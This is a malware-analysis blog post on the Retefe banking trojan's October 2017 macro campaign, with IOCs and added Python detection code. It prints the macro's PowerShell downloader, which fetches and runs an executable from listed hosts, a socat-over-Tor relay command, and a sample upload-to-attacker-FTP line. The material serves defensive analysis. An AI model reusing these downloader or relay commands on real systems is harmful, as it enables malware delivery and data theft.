Wednesday, 11 October 2017

Retefe Banking Trojan Updates Spreading Mechanism

In October 2017 the Retefe banking trojan changed the way it spreads to its Swiss targets.

In September 2017 we observed it being spread through LNK files embedded in documents; see my previous blog post on that campaign here.

Attack flow in September 2017: Doc -> LNK -> PowerShell -> Retefe

Since the second week of October 2017, however, it is being spread through macro-based documents:

Attack flow in October 2017: Doc -> Macro -> PowerShell -> Retefe

Filename pattern of the documents sent in the campaign:

Dokument_<digits>_mm_dd_yyyy.doc

The document displays a warning in German prompting the user to enable macros in order to view its contents, as shown in Figure 1.


Figure 1

Execution Flow

First, the macro launches PowerShell, which tries the following URLs in order and downloads the payload from the first one that responds:

hxxp://sergiocarfagna.it/uibojvr.exe
hxxp://abdulhamit.org/aqdbgpg.exe
hxxp://areanuova.it/mbahhhd.exe
hxxp://venturadatacom.com/vrqgpao.exe
hxxp://centralbaptistchurchnj.org/wruaoud.exe

Below is the PowerShell command line the macro runs. The original is a single line; it is broken into lines and commented here for readability, with the URLs defanged (hxxp):

powershell -WindowStyle Hidden
$webclient = new-object System.Net.WebClient;
$myurls = 'hxxp://sergiocarfagna.it/uibojvr.exe,hxxp://abdulhamit.org/aqdbgpg.exe,hxxp://areanuova.it/mbahhhd.exe,hxxp://venturadatacom.com/vrqgpao.exe,hxxp://centralbaptistchurchnj.org/wruaoud.exe'.Split(',');   # five download URLs, tried in order
$path = $env:temp + '\65536.exe';   # the payload is always saved as %TEMP%\65536.exe
foreach($myurl in $myurls){
    try{
        $webclient.DownloadFile($myurl.ToString(), $path);
        Start-Process $path;   # run the payload as soon as one download succeeds
        break;                 # and stop contacting the remaining URLs
    }catch{}                   # a failed download is swallowed; the next URL is tried
}

The first payload that downloads successfully is launched by PowerShell with Start-Process; the remaining URLs are never contacted, so on a given victim only one of the five hosts will show up in proxy logs.
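The same command line, triaged programmatically. This is an added Python example, not code from the original post or from the malware: it pulls the URL list and the drop path out of the macro's PowerShell downloader quoted above, refangs the hxxp:// URLs (the post defangs them; a command line captured from an endpoint will already read http://), and counts the traits that make the line a downloader rather than ordinary administration. The regexes are written for this variant's variable names ($myurls, $path) and are an assumption about this loader, not a general PowerShell parser.

```python
import re
from typing import Dict

# Constructed sample: the macro's PowerShell command line as quoted in the post,
# with the URLs still defanged (hxxp://) the way the post prints them.
SAMPLE_CMDLINE = (
    "powershell -WindowStyle Hidden $webclient = new-object System.Net.WebClient;"
    "$myurls = 'hxxp://sergiocarfagna.it/uibojvr.exe,hxxp://abdulhamit.org/aqdbgpg.exe,"
    "hxxp://areanuova.it/mbahhhd.exe,hxxp://venturadatacom.com/vrqgpao.exe,"
    "hxxp://centralbaptistchurchnj.org/wruaoud.exe'.Split(',');"
    "$path = $env:temp + '\\65536.exe';"
    "foreach($myurl in $myurls){try{$webclient.DownloadFile($myurl.ToString(), $path);"
    "Start-Process $path;break;}catch{}}"
)

# Assumption: the loader keeps this variant's variable names ($myurls, $path).
URL_LIST_RE = re.compile(r"\$myurls\s*=\s*'([^']+)'\s*\.Split\(','\)", re.I)
DROP_PATH_RE = re.compile(r"\$path\s*=\s*\$env:temp\s*\+\s*'([^']+)'", re.I)


def refang(url: str) -> str:
    """Restore a defanged hxxp:// URL to http:// so it can be fed to a blocklist."""
    return re.sub(r"^hxxp(s?)://", r"http\1://", url, flags=re.I)


def host_of(url: str) -> str:
    """Hostname part of a URL, lower-cased, with scheme and path stripped."""
    return re.sub(r"^\w+://", "", url).split("/")[0].lower()


def extract_iocs(cmdline: str) -> Dict[str, object]:
    """Pull the download URLs, their hosts and the drop path out of the loader."""
    m = URL_LIST_RE.search(cmdline)
    urls = [refang(u.strip()) for u in m.group(1).split(",")] if m else []
    p = DROP_PATH_RE.search(cmdline)
    return {
        "urls": urls,
        "hosts": sorted({host_of(u) for u in urls}),
        # $env:temp + '\65536.exe' becomes %TEMP%\65536.exe on the victim
        "drop_path": "%TEMP%" + p.group(1) if p else None,
    }


def downloader_score(cmdline: str) -> int:
    """Count the loader traits present; each alone is weak, together they are not."""
    traits = [
        r"-WindowStyle\s+Hidden",      # no console window for the victim to notice
        r"System\.Net\.WebClient",      # .NET download primitive
        r"\.DownloadFile\(",            # fetch to disk ...
        r"Start-Process\s+\$path",      # ... and run what was fetched
        r"\$env:temp",                  # staged in a user-writable directory
        r"catch\s*\{\s*\}",             # silent failover to the next URL
    ]
    return sum(1 for t in traits if re.search(t, cmdline, re.I))


def looks_like_retefe_loader(cmdline: str) -> bool:
    """True when at least four of the six loader traits are present."""
    return downloader_score(cmdline) >= 4
```

The score threshold is deliberately below six: the author can rename a variable or drop -WindowStyle Hidden in the next campaign without the remaining traits changing, whereas a single exact-string signature on the command line would go quiet.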

In our case the MD5 hash of the downloaded payload is: 6233e426bd6ade588463d268897f813b

Indicators of Compromise

1. Drops a JavaScript file at C:\ProgramData\<random_name>.<random_extension>

Below are the details of the config object embedded in the JavaScript:

dl: Tor servers: ["igs67efmlcucq57u.onion","jotetnnmfzb42sdw.onion","ou47twzxgnicn7ga.onion","aulqkm5upaqmto3i.onion"]
cert: a Comodo-signed certificate with serial number 00 ff 66 fa 4e 0b 64 80 0e
ps: certificate installation script
pstp: Base64-encoded PowerShell script that installs Tor and socat
pslog: Base64-encoded PowerShell script that collects information about the machine and uploads it over FTP to the attacker's server, ftp.liwest.at/logs

Once again we do not observe use of the EternalBlue exploit: there is no pseb section in the JavaScript's config.
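A responder who has carved the config out of the JavaScript wants the same handful of answers every time: which onion addresses, where the logs go, whether Tor and socat get installed, and whether the EternalBlue (pseb) section is back. The following is an added Python example, not code from the original post or from the malware. The field names and onion addresses are the ones listed above; the config is assumed to have been extracted into a dict, and the script bodies and certificate value in the sample are placeholders written for this example, not the real contents.

```python
import base64
import re
from typing import Dict


def b64_script(text: str) -> str:
    """Encode a placeholder script the way the pstp/pslog fields are stored."""
    return base64.b64encode(text.encode("utf-8")).decode("ascii")


# Constructed sample config. Keys and onion addresses follow the post; the
# cert value and script bodies are placeholders, not the malware's real data.
SAMPLE_CONFIG = {
    "dl": ["igs67efmlcucq57u.onion", "jotetnnmfzb42sdw.onion",
           "ou47twzxgnicn7ga.onion", "aulqkm5upaqmto3i.onion"],
    "cert": "<certificate blob placeholder; real one is Comodo-signed, serial 00ff66fa4e0b64800e>",
    "ps": "<certificate installation script placeholder>",
    "pstp": b64_script("Start-Process $env:temp\\tor.exe; Start-Process $env:temp\\socat.exe"),
    "pslog": b64_script("$wc = New-Object System.Net.WebClient; "
                        "$wc.UploadFile('ftp://ftp.liwest.at/logs/' + $env:COMPUTERNAME, $log)"),
}

ONION_RE = re.compile(r"[a-z2-7]{16}\.onion")       # v2 hidden-service names, as used in 2017
FTP_RE = re.compile(r"ftp://([^/'\"\s]+)", re.I)


def decode_ps(blob: str) -> str:
    """Base64-decode a stored script. PowerShell -EncodedCommand payloads are
    UTF-16LE, so sniff for the zero byte that encoding puts after the first
    character before falling back to UTF-8."""
    raw = base64.b64decode(blob)
    if len(raw) >= 2 and raw[1:2] == b"\x00":
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def summarize_config(cfg: Dict[str, object]) -> Dict[str, object]:
    """Reduce a Retefe-style config to the indicators a responder acts on."""
    pstp = decode_ps(cfg["pstp"]) if cfg.get("pstp") else ""
    pslog = decode_ps(cfg["pslog"]) if cfg.get("pslog") else ""
    return {
        "onions": [o for o in cfg.get("dl", []) if ONION_RE.fullmatch(o)],
        "exfil_ftp_hosts": sorted({h.lower() for h in FTP_RE.findall(pslog)}),
        "installs_tor_and_socat": bool(re.search(r"\btor\.exe", pstp, re.I))
                                  and bool(re.search(r"\bsocat", pstp, re.I)),
        "installs_cert": bool(cfg.get("cert")) and bool(cfg.get("ps")),
        # The post ties EternalBlue use to a pseb section; its absence is what it reports.
        "has_eternalblue_section": "pseb" in cfg,
    }
```

Keeping the decoded pstp and pslog text alongside the summary is worth the disk space: the exfiltration host and the installer commands are what change between campaigns, and a diff of the decoded scripts is a faster way to spot that than re-reading the obfuscated JavaScript.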

2. Drops the file Microsoft.Win32.TaskScheduler.dll in the path %temp%\random\

This DLL is loaded by the PowerShell script in order to create the scheduled task.

3. Drops a PowerShell script at C:\ProgramData\<random_name>.ps1

This PowerShell script sets up the scheduled task that runs both Tor and socat. socat listens on 127.0.0.1:5555 and relays every connection through the local Tor SOCKS port (9050) to port 80 of ou47twzxgnicn7ga.onion, one of the dl servers from the config, as shown below:

socat.exe tcp4-LISTEN:5555,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:ou47twzxgnicn7ga.onion:80,socksport=9050
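Hunting for that relay in process-creation telemetry is more robust than matching the exact string, because the listening port and the onion name are the parts most likely to change. The following is an added Python example, not code from the original post: it parses socat's address arguments into structured fields (listener port, bind address, SOCKS proxy, upstream host and port) and flags a local listener whose upstream is a .onion. The events are constructed for the example, modelled on the command line above plus two benign lines; the image paths are made up.

```python
import re
from typing import Dict, List, Optional

# Constructed process-creation events: the socat line quoted above plus two
# benign command lines. Made up for this example, not telemetry from the post.
SAMPLE_EVENTS = [
    {"image": r"C:\ProgramData\xk3p\socat.exe",
     "cmdline": "socat.exe tcp4-LISTEN:5555,reuseaddr,fork,keepalive,bind=127.0.0.1 "
                "SOCKS4A:127.0.0.1:ou47twzxgnicn7ga.onion:80,socksport=9050"},
    {"image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": "schtasks /query /tn \\Microsoft\\Windows\\Backup"},
    {"image": r"C:\tools\socat.exe",
     "cmdline": "socat.exe tcp-listen:8080,fork tcp:intranet.example:80"},
]

SOCAT_RE = re.compile(r"(^|[\\/\s])socat(\.exe)?\b", re.I)
# socat address syntax: TYPE:param,opt,opt=value ...
LISTEN_RE = re.compile(r"tcp4?-listen:(\d+)(\S*)", re.I)
SOCKS_RE = re.compile(r"socks4a?:([^:\s,]+):([^:\s,]+):(\d+)(?:,socksport=(\d+))?", re.I)


def parse_socat(cmdline: str) -> Optional[Dict[str, object]]:
    """Structured view of a socat command line; None when it is not socat at all."""
    if not SOCAT_RE.search(cmdline):
        return None
    lm = LISTEN_RE.search(cmdline)
    sm = SOCKS_RE.search(cmdline)
    opts = [o for o in (lm.group(2) if lm else "").split(",") if o]
    bind = next((o.split("=", 1)[1] for o in opts if o.lower().startswith("bind=")), None)
    return {
        "listen_port": int(lm.group(1)) if lm else None,
        "bind": bind,
        "fork": any(o.lower() == "fork" for o in opts),   # one relay per connection
        "socks_proxy": sm.group(1) if sm else None,
        "target_host": sm.group(2).lower() if sm else None,
        "target_port": int(sm.group(3)) if sm else None,
        "socks_port": int(sm.group(4)) if sm and sm.group(4) else None,
    }


def is_tor_relay(parsed: Optional[Dict[str, object]]) -> bool:
    """A local listener whose upstream is a hidden service reached over SOCKS."""
    if not parsed or parsed["listen_port"] is None or not parsed["target_host"]:
        return False
    return str(parsed["target_host"]).endswith(".onion")


def hunt(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Return the events that set up a socat-to-Tor relay, with the parsed fields."""
    hits = []
    for ev in events:
        parsed = parse_socat(ev["cmdline"])
        if is_tor_relay(parsed):
            hits.append({"image": ev["image"], **parsed})
    return hits
```

On a live host the same setup also shows up as loopback listeners on 5555 (socat) and 9050 (Tor's SOCKS port); the command-line check is the one that survives in process telemetry after the host has been cleaned or the task has stopped.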

MD5 hashes of the documents:

8d913b22cb04b32f0de40b31d19d19fc
9fe7ee427e0fd9d6e488c2d9aa117cf4
50908ab896dbcb2feafa3d27dd332ff6
a32501f73b532bc6a374bceec7616f2e
5ac86c732167d90bbe598598093ca4bd
4381c9ee65d66d3e0c7aebd99ec253f6
78a830743d1b02abad4b15de96174f39
26b76c6b56d5ef32b28865432ea2c08c
